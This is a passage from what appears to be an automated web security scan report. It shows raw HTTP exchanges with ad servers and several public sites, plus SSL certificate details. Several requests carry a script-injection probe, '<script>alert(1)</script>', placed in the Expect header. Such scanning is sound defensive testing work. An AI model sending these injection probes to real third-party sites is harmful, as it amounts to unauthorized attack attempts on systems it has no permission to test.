User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!
(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:33:36 GMT
Pragma: no-cache
Content-Length: 5856
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

36.2. http://ads.bluelithium.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Request

GET /st?ad_type=ad&ad_size=300x250&section=1521132 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:09:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:09:42 GMT
Pragma: no-cache
Content-Length: 4293
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

36.3. http://pcm2.map.pulsemgr.com/uds/pc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm2.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21273&sig=b2d480a4453ebdf16df158c05281fe0a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pcm2.map.pulsemgr.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Mon, 02 May 2011 02:36:14 GMT

GIF89a.............!.......,...........D..;

36.4. http://www.bocajava.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bocajava.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bocajava.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"318-1280758987000"
Last-Modified: Mon, 02 Aug 2010 14:23:07 GMT
Content-Length: 318
Date: Mon, 02 May 2011 00:03:41 GMT
Connection: close
Set-Cookie: security=1bjb; path=/

..............(.......(....... ...............................................................www.fff.UUU.DDD.333."""...................................................................................
...[SNIP]...

36.5. http://www.lavalife.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lavalife.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lavalife.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
p3p: CP="CAO PSA OUR"
Accept-Ranges: bytes
ETag: W/"1150-1296589877000"
Last-Modified: Tue, 01 Feb 2011 19:51:17 GMT
Content-Length: 1150
Date: Sun, 01 May 2011 23:22:31 GMT
Age: 1364
X-Cache: HIT from www.lavalife.com
Connection: keep-alive

............ .h.......(....... ..... .................................................................................................................................................................B:
...[SNIP]...

36.6. http://www.ourprayer.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:41 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...
</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
...[SNIP]...

36.7. http://www.politicalissuestoday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politicalissuestoday.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.politicalissuestoday.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
ETag: "AAAASkB3VeQ"
Last-Modified: Fri, 04 Jun 2010 07:29:30 GMT
Expires: Sun, 01 May 2011 23:46:24 GMT
Content-Length: 1406
Date: Sun, 01 May 2011 23:46:19 GMT

..............h.......(....... .......................................T0................................................................................................................................
...[SNIP]...

36.8. http://www.westjet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westjet.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.westjet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4286
Last-Modified: Wed, 02 Feb 2011 21:44:16 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=59725
Expires: Mon, 02 May 2011 15:49:28 GMT
Date: Sun, 01 May 2011 23:14:03 GMT
Connection: close

...... .... .........(... ...@..... ...................................................................................................................................................................
...[SNIP]...

37. SSL certificate
There are 2 instances of this issue:


37.1. https://www.crankyape.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.crankyape.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue May 04 16:42:31 CDT 2010
Valid to:  Wed Jul 06 14:55:48 CDT 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

37.2. https://www.onlinemicrofiche.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.onlinemicrofiche.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Wed Dec 02 18:00:00 CST 2009
Valid to:  Fri Dec 13 17:59:59 CST 2013

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
